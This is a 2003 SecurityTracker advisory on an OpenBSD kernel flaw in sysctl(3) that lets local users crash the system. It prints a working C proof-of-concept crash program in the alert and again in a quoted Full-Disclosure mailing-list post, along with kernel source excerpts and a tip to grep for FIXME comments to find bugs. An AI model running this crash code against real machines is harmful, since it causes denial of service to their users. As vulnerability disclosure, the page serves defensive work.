SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (UNIX)  >   OpenBSD Kernel Vendors:   OpenBSD
OpenBSD sysctl(3) Flaw Lets Local Users Crash the System
SecurityTracker Alert ID:  1008270
SecurityTracker URL:  http://securitytracker.com/id/1008270
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 21 2003
Impact:   Denial of service via local system
Exploit Included:  Yes  
Version(s): OpenBSD 3.4 and prior versions
Description:   A vulnerability was reported in OpenBSD in the sysctl(3) function. A local user can cause the system to crash.

It is reported that a local user can call sysctl(3) with certain arguments to cause the kernel to crash.

The flaw reportedly resides in 'uvm_glue.c' in uvm_vsunlock().

The following demonstration exploit code was provided in a different report:

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}

Impact:   A local user can cause the system to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.openbsd.org/ (Links to External Site)
Cause:   Boundary error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Nov 21 2003 (Vendor Issues Fix) Re: OpenBSD sysctl(3) Flaw Lets Local Users Crash the System
The vendor has issued a fix.



 Source Message Contents

Subject:  Re: [Full-Disclosure] OpenBSD kernel panic, yet still O*BSD much



i can confirm this SECURITY vulnerability on all openbsd 3.x.
so apperantly searching for "XXX" and/or "FIXME" strings in obsd
kernel is a guaranteed way to locate a ring 0 vulnerability ...
nice, real nice ;P

some examples;

		char buf[128], *bufp;   /* FIXME */
                int len = sh.s_size, path_index, entry_len;

                /* DPRINTF(("COFF shlib size %d offset %d\n",
                         sh.s_size, sh.s_scnptr)); */

                error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf,
                                len, sh.s_scnptr,
...

/*
 * vslock: wire user memory for I/O
 *
 * - called from physio and sys___sysctl
 * - XXXCDC: consider nuking this (or making it a macro?)
 */

void
uvm_vsunlock(p, addr, len)
        struct proc *p;
        caddr_t addr;
        size_t  len;
{
        uvm_fault_unwire(&p->p_vmspace->vm_map, trunc_page((vaddr_t)addr),
                round_page((vaddr_t)addr + len));
}


grep -rn or cscope is your friend ;)


On Wed, 19 Nov 2003 crispin@immunix.com wrote:

>
> ppl think "hey, local DoS sucks", therefore they are.
> i think "hey, obsd sucks", therefore i am.
>
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int main ()
> {
>         unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
>
>         return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
> }
>
> it's wide, it's opened, it's surely obsd!
>
> --
> Crispin Coward, Ph.D.          http://immunix.com/~crispin/
> Chief Scientist, Immunix       http://immunix.com
>             http://www.immunix.com/tosell/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC